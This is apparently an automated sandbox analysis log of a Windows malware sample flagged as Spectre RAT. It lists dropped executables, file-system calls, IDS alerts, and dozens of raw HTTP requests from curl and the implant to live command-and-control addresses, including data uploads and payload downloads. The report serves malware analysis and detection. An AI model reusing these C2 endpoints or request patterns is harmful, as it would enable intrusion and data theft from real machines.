Source: vqMMwqCFZQ.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, nircmdc.exe.50.dr
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exe, Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exe, Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exe, Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe, Code function: 50_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,50_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe, Code function: 50_2_004107A0 FindFirstFileA,50_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe, Code function: 86_2_004062D5 FindFirstFileW,FindClose,86_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe, Code function: 86_2_00402E18 FindFirstFileW,86_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe, Code function: 86_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,86_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\139918\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\139918
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\

Networking

Source: Network traffic, Suricata IDS: 2853767 - Severity 1 - ETPRO MALWARE Win32/Spectre RAT CnC Activity M1 : 192.168.2.4:49874 -> 178.215.224.74:80
Source: Network traffic, Suricata IDS: 2853768 - Severity 1 - ETPRO MALWARE Win32/SpectreRAT CnC Activity M2 : 192.168.2.4:49874 -> 178.215.224.74:80
Source: Joe Sandbox View, ASN Name: LVLT-10753US LVLT-10753US
Source: unknown, DNS traffic detected: query: GyxNFpxuLvDE.GyxNFpxuLvDE replaycode: Name error (3)
Source: unknown, DNS traffic detected: query: mCpLognXwrhUlFWj.mCpLognXwrhUlFWj replaycode: Name error (3)
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 625Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 237Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 527Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 416Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 335Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 8387Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 2463Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 1699Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 133Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php?uvyw=6 HTTP/1.1Content-Type: multipart/form-data; boundary=----974767299852498929531610575User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 29747Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=5 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=31 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=7 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=10&melq=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=33&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=8 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=2021&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3002&melq=e3ad1d0b2449c169e66efe472513a377*6&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=2016&jwvs=9A5605DE11447A0E2031624EE8FBDE&bsxa=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: mCpLognXwrhUlFWj.mCpLognXwrhUlFWj
Source: unknownHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 625Cache-Control: no-cache
Source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: ftp://ftp.info-zip.org/pub/infozip
Source: curl.exe, 00000016.00000002.2522190668.0000000000A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.252/v10/ukyh
Source: curl.exe, 00000016.00000002.2522190668.0000000000A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.252/v10/ukyh.php?jspo=6
Source: curl.exe, 00000055.00000002.3021797267.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000059.00000002.3066064428.0000000003078000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005E.00000002.3087963888.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000061.00000002.3106467022.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.
Source: curl.exe, 00000040.00000002.2846406096.0000000003278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.8
Source: curl.exe, 0000005E.00000002.3087963888.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?gi
Source: curl.exe, 0000005E.00000002.3087963888.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?gi.224.74ur32.dll
Source: curl.exe, 0000004C.00000002.2931976614.00000000032F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1
Source: curl.exe, 0000004C.00000002.2931976614.00000000032F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1%
Source: curl.exe, 00000038.00000002.2799649207.00000000009C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=31
Source: curl.exe, 00000055.00000002.3021797267.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml
Source: curl.exe, 00000026.00000002.2666947968.0000000003208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D
Source: curl.exe, 0000002F.00000002.2756880706.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D
Source: curl.exe, 0000002F.00000002.2756880706.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3Db
Source: curl.exe, 0000001D.00000002.2606200469.0000000000C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=5
Source: curl.exe, 0000001D.00000002.2606200469.0000000000C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=5W5
Source: curl.exe, 00000061.00000002.3106467022.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6
Source: curl.exe, 0000004F.00000002.2949097146.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dll
Source: curl.exe, 00000023.00000002.2639422420.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dllr
Source: curl.exe, 00000046.00000002.2895434106.0000000003548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=7
Source: curl.exe, 0000001A.00000002.2589388864.0000000000A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.u
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
